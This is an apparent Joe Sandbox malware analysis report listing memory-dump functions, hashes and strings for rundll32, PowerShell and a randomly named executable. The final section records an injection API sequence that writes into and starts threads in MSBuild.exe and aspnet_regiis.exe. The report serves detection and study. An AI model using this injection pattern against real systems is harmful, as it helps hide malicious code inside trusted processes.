Instruction Fuzzy Hash: FD01A76171D7A64FD727516858206669FB35FD3640B2A409BC4C0DB2D2CE194D478366

Analysis Process: rundll32.exePID: 7188, Parent PID: 2596COMMON

Executed Functions

Function 04E809F0 Relevance: 2.6, Strings: 2, Instructions: 72COMMON

Download Yara Rule

Strings

d7p, xrefs: 04E80A1E
lo7p, xrefs: 04E80A35

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID: lo7p$d7p
API String ID: 0-3642153419
Opcode ID: 2860ff7f24f302a508ee640e9320cfdb0fb13860684edf99eee678d2e34500a3
Instruction ID: 84947f38cea8c30de04d4fd7731e08f66ca53cac2d80cd8a90fdeac740144e42
Opcode Fuzzy Hash: 2860ff7f24f302a508ee640e9320cfdb0fb13860684edf99eee678d2e34500a3
Instruction Fuzzy Hash: 82217874B102149FCB44EF69E898AAD7BF2FF88700F258069E446EB3A4CB719C048F50

Function 04E80A00 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

d7p, xrefs: 04E80A1E
lo7p, xrefs: 04E80A35

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID: lo7p$d7p
API String ID: 0-3642153419
Opcode ID: eff7407ee7f54454c4bb2623420c97284e0b835a4c72820b2b11e25408aa02bf
Instruction ID: 2c4d85848f5761b5abb48d826e3542773a3d2016c2d99fbff7009ddc1d69c1aa
Opcode Fuzzy Hash: eff7407ee7f54454c4bb2623420c97284e0b835a4c72820b2b11e25408aa02bf
Instruction Fuzzy Hash: 14213874B102049FCB44EF69D598A6D7BF6EF8C600F2190A9E406EB3A5DB759C048B51

Function 04E81209 Relevance: .4, Instructions: 430COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 221f51f448574c49bc04b36611749cf1a496b673f726210d916807e81708a371
Instruction ID: efd06dadc565d5eeefc90d0bca2d19a0a809f91a12fe432a9117da300c0ab33c
Opcode Fuzzy Hash: 221f51f448574c49bc04b36611749cf1a496b673f726210d916807e81708a371
Instruction Fuzzy Hash: C5E02B32608184AFCB11AF78E85889D3FB7EFC631170940EBE44ADB396CA380C05DB91

Function 04E80B37 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a61bdae20372aef1bb27a5df03b695d70d3cc3a2078bb410783a3edcc17c8f26
Instruction ID: f983ab12d10d0b27c8c86a792ea24ab4a9de8160eb1a241a45451f71b56275e1
Opcode Fuzzy Hash: a61bdae20372aef1bb27a5df03b695d70d3cc3a2078bb410783a3edcc17c8f26
Instruction Fuzzy Hash: 19518074B002208FCB48EB39D894B6E77E7BFC8251B2544A8E509DB375DE35EC018B90

Function 04E81630 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7079090c0692d81122b622a554bab5df24a20a31cf6f62512206295d4741ad5e
Instruction ID: 242b85156e4a36d7caf01e835b0dad6c3aeb44bd64859333f1368893636699a4
Opcode Fuzzy Hash: 7079090c0692d81122b622a554bab5df24a20a31cf6f62512206295d4741ad5e
Instruction Fuzzy Hash: 7551E4307003688FDF0AAB78D8507AE7AE7ABC9301F14406DD90D9B395CF795D829B91

Function 04E80B48 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cb0ab5b7e44525d8b21b20b4ff7c266cc4dde51f84eb3dfe1396258da8f5419
Instruction ID: 653380111c3709209bd96c3bd930e107845ff1679b4114155875099582cc4132
Opcode Fuzzy Hash: 5cb0ab5b7e44525d8b21b20b4ff7c266cc4dde51f84eb3dfe1396258da8f5419
Instruction Fuzzy Hash: 8F516174B002208FDB48EF39D894A6E77E7AFC8651F2544A8E609DB375DE35EC418B90

Function 04E81892 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87037db80959730822e13737bc506a015fa0ef260011d235b2ab8439cead5ee3
Instruction ID: c9329b3066cdf019f71ee6ff7682cba430baa5b0038f1047f73c35215a6b3082
Opcode Fuzzy Hash: 87037db80959730822e13737bc506a015fa0ef260011d235b2ab8439cead5ee3
Instruction Fuzzy Hash: 8031C4747103349FDB0A5B78D81476E7EABEBC9742F10406AA609A7399CF3C0D8197A1

Function 04E80838 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ddf5572c9eef1b78266724dcfa558013b3d31eb031686bfa8fd11a6e9428b0f
Instruction ID: 19bd088a9f48f561f087a7bb66399ee72e39930d4ac5fb28e2ab0f306183f97a
Opcode Fuzzy Hash: 4ddf5572c9eef1b78266724dcfa558013b3d31eb031686bfa8fd11a6e9428b0f
Instruction Fuzzy Hash: 98410B74E00219DFCB48DFA8E88499DBBF6FF58301B104569E915AB364DB346D41CF50

Function 04E80848 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b5842082fa7df56e72a2358efa187399981ebe821f96cb01ba4b1d926c18864
Instruction ID: ecc9b580778e1e274bb36964f0cfaab9449f252631518631f177cd7676e0d302
Opcode Fuzzy Hash: 2b5842082fa7df56e72a2358efa187399981ebe821f96cb01ba4b1d926c18864
Instruction Fuzzy Hash: BD412C74E00229DFCB48DFA9E88499DBBF6FF58301B108569E915AB324DB34AD41CF50

Function 04E81A09 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cda96d458202a140baae05d84998bc9823995de39c97be4591aec4bb6b11382
Instruction ID: 8549771f11dd75392c3f4a68fe09dda29641acd5e746e2f5570bda2f612f9c8d
Opcode Fuzzy Hash: 5cda96d458202a140baae05d84998bc9823995de39c97be4591aec4bb6b11382
Instruction Fuzzy Hash: AF21E5356042648FDB14EB68D4547DE7BF2AF88305F10056DD04EAB391CBBAAD45CBA1

Function 04E81A18 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f5a76e7db82d33cddf3d6673c9bc8019373a8944462f007398380af7631d44c
Instruction ID: 0c9d0c7602c728d49a3e7211c2d7818a3b3b2cbb94cd666daed7fbe8407c92be
Opcode Fuzzy Hash: 7f5a76e7db82d33cddf3d6673c9bc8019373a8944462f007398380af7631d44c
Instruction Fuzzy Hash: F121B3306042648FDB14EB68C45479EBBF2AF89305F00056DD14AAB3A1DFBAAD45CBA1

Function 0347D01C Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2601426588.000000000347D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0347D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_347d000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b4d1ca7733f79a5788f0ccc617a1114573b19383f97caeee82162c7e2dd1812
Instruction ID: e21843672d4d644cc235de9fa0bc8d9565992d6050f66d884707cd15c87f8a6b
Opcode Fuzzy Hash: 4b4d1ca7733f79a5788f0ccc617a1114573b19383f97caeee82162c7e2dd1812
Instruction Fuzzy Hash: 301106B0D143809EDB10DF24D984B66BBA9EF85218F248A6ED50A4F341C23AD447C665

Function 0347D006 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2601426588.000000000347D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0347D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_347d000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62145174c05083ebadb245b4893719c7b0517a24a570e77cb83455cd2e3b3c9e
Instruction ID: ca7850fd449254e912b8ac303274e2908ca39017868741f66e060f6fe81259ca
Opcode Fuzzy Hash: 62145174c05083ebadb245b4893719c7b0517a24a570e77cb83455cd2e3b3c9e
Instruction Fuzzy Hash: C51194719093C08FD712DF24D594755BF71EF46218F2985EBC4898F693C33A944AC762

Function 04E81580 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5a68f55a31a30c4db23c4397343dbd2e65c4b1d920f5a6217a97a5c95972604
Instruction ID: 6db5b2d8fb85fab691165afec460afd7a736368ef828697d7c3c7a922ebd2c78
Opcode Fuzzy Hash: f5a68f55a31a30c4db23c4397343dbd2e65c4b1d920f5a6217a97a5c95972604
Instruction Fuzzy Hash: E9118270504396CFDB04EB28D4447DABBB2AB10349F14499DD1485F282DBBAA94BCBD1

Function 04E80D35 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d8756cb865f8ffe5a5b9d8da5321ac2b4e28fd936e17d0f6c400bd50b3a37c5
Instruction ID: 75fa193a76106c7b3624e6bf85ea1f6e3f18c9d8a3a39490a9a7b4c79f6c8e8b
Opcode Fuzzy Hash: 2d8756cb865f8ffe5a5b9d8da5321ac2b4e28fd936e17d0f6c400bd50b3a37c5
Instruction Fuzzy Hash: 6CF0EC31745314DFDF1555289C297587F51EB84326F060096E21C8F1E6C664784D8250

Function 04E809B0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4ddf6330eddbb1bc13801ef558274831555b5f4b7f41cfcd8c0be5a2372f0ba
Instruction ID: 48acdad76d8cc7000ee2e53fdf280e920aee05a9d5e1aea556ff74fda7acef89
Opcode Fuzzy Hash: e4ddf6330eddbb1bc13801ef558274831555b5f4b7f41cfcd8c0be5a2372f0ba
Instruction Fuzzy Hash: D9E02630B400208FC700DB3CD444AE833E6EF8420531649E1E845DB33ADA35DC118BC0

Function 04E81843 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 739a722e4684e0850416c2e22e32ba48eec5f0e6bc9fc9d88740b63daf4e3b5e
Instruction ID: c16be62e6d12034934aa176fe75b557a32123ebe59d7f280e82a76702f5d36b6
Opcode Fuzzy Hash: 739a722e4684e0850416c2e22e32ba48eec5f0e6bc9fc9d88740b63daf4e3b5e
Instruction Fuzzy Hash: 1FE09B303047A44EDB21E774940038DB7E29F41319F00096DC14A5B641CBB7794487A2

Function 04E81548 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea18bda7fb0f274c5b2264c1b758217adc6801d56f23528bee0aeef2223900ac
Instruction ID: 671a4a838ffda7b5a3af84070339d3bd946a55c9712852cc8e03bfba45622953
Opcode Fuzzy Hash: ea18bda7fb0f274c5b2264c1b758217adc6801d56f23528bee0aeef2223900ac
Instruction Fuzzy Hash: 8AD0C232200108ABCB043B59E40885E7BAFEBC42217018026F50AA7380CE344D0587D0

Function 04E809C0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 875a791870643afd9b48fb87bbd299deda83273d8c6fadb9130718555c1d14fb
Instruction ID: 4f667c77f012fdb8cc1ac0004dc850698b09660d9b04dfec569f6d6f32e00838
Opcode Fuzzy Hash: 875a791870643afd9b48fb87bbd299deda83273d8c6fadb9130718555c1d14fb
Instruction Fuzzy Hash: 05D0A931B002308FCB44EB7DE4088AA73EEAF8856031148A1EA09DB328EE75DC1047C0

Analysis Process: powershell.exePID: 7516, Parent PID: 3120COMMON

Executed Functions

Function 07B004A3 Relevance: 5.1, Strings: 4, Instructions: 123COMMON

Download Yara Rule

Strings

Cl, xrefs: 07B00623
4'dq, xrefs: 07B0058D
Cl, xrefs: 07B00615
4'dq, xrefs: 07B00599

Memory Dump Source

Source File: 00000011.00000002.1914853901.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7b00000_powershell.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq$Cl$Cl
API String ID: 0-2891603558
Opcode ID: 836b177ea5d415a982687e7f6f523c720d03b2c76546d8d358fd324b0bcb75a6
Instruction ID: 2f1329638ddb9ef983d3afe1d5485445fb1afb320e687f9a558dc00741cd0cfb
Opcode Fuzzy Hash: 836b177ea5d415a982687e7f6f523c720d03b2c76546d8d358fd324b0bcb75a6
Instruction Fuzzy Hash: 813147F17112068BEF2476759461BBEBFA2EFC6251F5080AAD846CA1C1DF35D581C3E2

Function 07B00694 Relevance: 3.9, Strings: 3, Instructions: 160COMMON

Download Yara Rule

Strings

$dq, xrefs: 07B007AF
$dq, xrefs: 07B0073A
$dq, xrefs: 07B0079F

Memory Dump Source

Source File: 00000011.00000002.1914853901.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7b00000_powershell.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq
API String ID: 0-2861643491
Opcode ID: c02bbf0500cd0c4a159058cf966258baa82cd1bdbec48eaba570e23ccd6362a3
Instruction ID: 9c80c07a2eab74b67a7516abf56b2b96a263fba08f6a090e46b323f21ea4aa9e
Opcode Fuzzy Hash: c02bbf0500cd0c4a159058cf966258baa82cd1bdbec48eaba570e23ccd6362a3
Instruction Fuzzy Hash: E55103F5710306DFEB24AA64C815BBA7BA2EB84351F1084A9E9058F2C1DF35DD81CBD1

Function 0330D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1886800608.000000000330D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0330D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_330d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24b68dc3cc302fda53e04257e6c339c48f02568890102969c7d9aece615c0e71
Instruction ID: eaf5cabaf959ed020f13a5981de65c68c930712c645a5bd04d4e33df90b53491
Opcode Fuzzy Hash: 24b68dc3cc302fda53e04257e6c339c48f02568890102969c7d9aece615c0e71
Instruction Fuzzy Hash: E901DB71509340AAE7208AA9CEC4B66BFDCEF51325F0CC55AED4C0A6C2C67C9842CAB5

Function 0330D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1886800608.000000000330D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0330D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_330d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4b5e99c35b010759fc2fda813bb1580a7e7e5528b53297003de76dc8536b6d8
Instruction ID: 3515d97e50ac5c509c794e68e0133f79e8bce87d82aaea26513558d5a1781269
Opcode Fuzzy Hash: e4b5e99c35b010759fc2fda813bb1580a7e7e5528b53297003de76dc8536b6d8
Instruction Fuzzy Hash: 5A012D7240E3C09FD7128B258D94B52BFB4DF53224F1D81CBD9888F1A3C2695849C772

Function 04BE2C06 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1887257375.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4be0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e4b9b37ba94387649ac5488aa36fc3b760021dd18fe04847d95b519400c8097
Instruction ID: 8c4998d6eada66ae078de0b0513dad9b4049d39313d47843da09b913510b8746
Opcode Fuzzy Hash: 4e4b9b37ba94387649ac5488aa36fc3b760021dd18fe04847d95b519400c8097
Instruction Fuzzy Hash: 29F0B735A001059FCB15CB9DD890AEEF7B5FF88324F248199E515A72A1C736A852CB51

Non-executed Functions

Function 07B00308 Relevance: 5.1, Strings: 4, Instructions: 57COMMON

Download Yara Rule

Strings

$dq, xrefs: 07B00352
$dq, xrefs: 07B0035E
4'dq, xrefs: 07B00373
4'dq, xrefs: 07B0037F

Memory Dump Source

Source File: 00000011.00000002.1914853901.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7b00000_powershell.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq$$dq$$dq
API String ID: 0-4229963660
Opcode ID: 2e1928175af007989314fc702446c594dafa2e4c06a8f6f4f9a1ec3f7a2c8af1
Instruction ID: 027db0397e137a5ac677a63c517f085c4cb9d52d3d15363172b37daad1331b00
Opcode Fuzzy Hash: 2e1928175af007989314fc702446c594dafa2e4c06a8f6f4f9a1ec3f7a2c8af1
Instruction Fuzzy Hash: 6801F99170D3D64FC727626854203566FB29F8761072A40DBC885DF2D3CE144D46C3E7

Analysis Process: powershell.exePID: 7664, Parent PID: 7188COMMON

Executed Functions

Function 06F504A3 Relevance: 5.1, Strings: 4, Instructions: 123COMMON

Download Yara Rule

Strings

Cl, xrefs: 06F50615
4'dq, xrefs: 06F5058D
Cl, xrefs: 06F50623
4'dq, xrefs: 06F50599

Memory Dump Source

Source File: 00000013.00000002.1933585023.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq$Cl$Cl
API String ID: 0-2891603558
Opcode ID: 5b0792184f5d6286b861eff2a87363cc98e59879cf7c82ff1584adea0b826411
Instruction ID: deab0b183ed1f22f00b5529e552b99d8ce54d82a697566c91536a6e5389168db
Opcode Fuzzy Hash: 5b0792184f5d6286b861eff2a87363cc98e59879cf7c82ff1584adea0b826411
Instruction Fuzzy Hash: F3315B31F112058BDFA46A7894117BEB792BBC5351F55803ADE468A1C1DF35CD81C3A2

Function 06F50694 Relevance: 3.9, Strings: 3, Instructions: 160COMMON

Download Yara Rule

Strings

$dq, xrefs: 06F5079F
$dq, xrefs: 06F507AF
$dq, xrefs: 06F5073A

Memory Dump Source

Source File: 00000013.00000002.1933585023.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq
API String ID: 0-2861643491
Opcode ID: bf25a286ea03f2f49e110afd27a962797761aa11fdbd21e75270fb8ac1d89733
Instruction ID: 023ffc165af6e6bc5b928fecb2c3d0ab0d372d7fb2eb1fd4a7dc99b9ba6d1eae
Opcode Fuzzy Hash: bf25a286ea03f2f49e110afd27a962797761aa11fdbd21e75270fb8ac1d89733
Instruction Fuzzy Hash: AF510235B10209DFDBA49E64D811BBE7BA2AF84352F15C429EE058F291DF35DD80CBA1

Function 008429F0 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1895182843.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_840000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc1a1fb3c7edf0490bb654c9001b27bde9f6226e1d14752097157788cdc5357e
Instruction ID: c2c76937655ad2b4b0e91456e869ef553a270ceab5ef4d76ba26bfb79f4ad02e
Opcode Fuzzy Hash: bc1a1fb3c7edf0490bb654c9001b27bde9f6226e1d14752097157788cdc5357e
Instruction Fuzzy Hash: 85A1AD74A04249CFCB16CF98C4949AEFBB1FF49310B25859AD855EB3A1C735EC81CBA0

Function 00842B00 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1895182843.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_840000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b329de7e1ce60178e9f96f0678bd245b92461a7839fc7b3dc6ae6ad1835c5d7d
Instruction ID: 024b8a339af1539f17d732e75eea807012a9c6da65eda095f2eb9fef3e695f13
Opcode Fuzzy Hash: b329de7e1ce60178e9f96f0678bd245b92461a7839fc7b3dc6ae6ad1835c5d7d
Instruction Fuzzy Hash: 4B411874A00509DFCB05CF58C4D89AEFBB1FF48324B558269D815AB365C736EC91CBA4

Function 005DD005 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1892071529.00000000005DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5dd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b028d68a871e0b06843409d1460a0220555e71e3eca5e80c8b30ebfeac1aafa2
Instruction ID: d449e43b58b0353ee092b81ca95f1d4fd2208a4581787a54104bc0fbef97c67b
Opcode Fuzzy Hash: b028d68a871e0b06843409d1460a0220555e71e3eca5e80c8b30ebfeac1aafa2
Instruction Fuzzy Hash: D501806200D3C09FD7624B258C88752BFB8EF53224F0985DBE8888F2A7D2685C45C772

Function 005DD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1892071529.00000000005DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5dd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4bae40b428342976fd965a7becbb9102638c49c361f5e1627aa8e08c4eb4260
Instruction ID: 79d3349ae8597b7779454f9c71116f22e17cd1c17dc9fd8c8c1891c9c1c593ef
Opcode Fuzzy Hash: c4bae40b428342976fd965a7becbb9102638c49c361f5e1627aa8e08c4eb4260
Instruction Fuzzy Hash: 2D01F7710043449AE7309A1DCCC8B66BFE8EF91325F18C81BEC080B342D6799841C6B1

Non-executed Functions

Function 06F50308 Relevance: 5.0, Strings: 4, Instructions: 41COMMON

Download Yara Rule

Strings

$dq, xrefs: 06F50352
$dq, xrefs: 06F5035E
4'dq, xrefs: 06F5037F
4'dq, xrefs: 06F50373

Memory Dump Source

Source File: 00000013.00000002.1933585023.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq$$dq$$dq
API String ID: 0-4229963660
Opcode ID: f044114103980cb122d6dce069c4a2bec245e200ac345f4edf4f17e8be1ed499
Instruction ID: f083c48e54ec3632b08c1e3ec06b724b36b030e516bb334113dff86a4a5acae1
Opcode Fuzzy Hash: f044114103980cb122d6dce069c4a2bec245e200ac345f4edf4f17e8be1ed499
Instruction Fuzzy Hash: 5AF0F022F1E7A68FC76746286821112AFB26F8260133B41DBCD84DB2A2CE194D05C793

Analysis Process: zbjnkzvo4cc.exePID: 8012, Parent PID: 3120COMMON

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.8%
Total number of Nodes:	657
Total number of Limit Nodes:	10

Executed Functions

Function 68BF88C0 Relevance: 102.0, APIs: 27, Strings: 27, Instructions: 7491nativememorythreadCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE(?,?,?,?,?), ref: 68BFA814
ShowWindow.USER32 ref: 68BFA82A
VirtualAlloc.KERNELBASE ref: 68BFB035
CreateProcessW.KERNELBASE ref: 68BFB37D
NtGetContextThread.NTDLL ref: 68BFB6B2
NtAllocateVirtualMemory.NTDLL ref: 68BFB95D
NtAllocateVirtualMemory.NTDLL ref: 68BFBAF2
NtWriteVirtualMemory.NTDLL ref: 68BFBC13
NtWriteVirtualMemory.NTDLL ref: 68BFC20F
NtWriteVirtualMemory.NTDLL ref: 68BFC5B3
NtReadVirtualMemory.NTDLL ref: 68BFD522
NtWriteVirtualMemory.NTDLL ref: 68BFD784
NtWriteVirtualMemory.NTDLL ref: 68BFDFC1
NtCreateThreadEx.NTDLL ref: 68BFE3B3
CloseHandle.KERNEL32 ref: 68BFE763
CloseHandle.KERNEL32 ref: 68BFE8ED
GetConsoleWindow.KERNEL32 ref: 68BFEC6B
ShowWindow.USER32 ref: 68BFEC81
VirtualAlloc.KERNEL32 ref: 68BFEE31
NtGetContextThread.NTDLL ref: 68BFEEE0
CloseHandle.KERNEL32 ref: 68BFF5B4
CreateProcessW.KERNEL32 ref: 68BFF72D
NtWriteVirtualMemory.NTDLL ref: 68BFF8E3
NtWriteVirtualMemory.NTDLL ref: 68BFFA53
CloseHandle.KERNEL32 ref: 68BFFB41

Strings

;E-F, xrefs: 68BFCDE1
f?}, xrefs: 68BFCB17
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 68BFB186
En, xrefs: 68BFE27B
D, xrefs: 68BFEE8B
;E-F, xrefs: 68BFCE70
En, xrefs: 68BFE328
AEf, xrefs: 68BFEF7B
Y, xrefs: 68BFAF0A
+,^c, xrefs: 68BFB277
g]J, xrefs: 68BFDF5A
D_`, xrefs: 68BFAF85
Y, xrefs: 68BFAF80
AEf, xrefs: 68BFEF2A
%N[, xrefs: 68BFF937
@, xrefs: 68BFBAEA
[3?H, xrefs: 68BFA9EE
Yal, xrefs: 68BFE20A
6IX, xrefs: 68BFCBFF
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, xrefs: 68BFB23C, 68BFF6BA
ntdll.dll, xrefs: 68BFA8F5, 68BFF5FB
6IX, xrefs: 68BFCB72
g]J, xrefs: 68BFDEEC
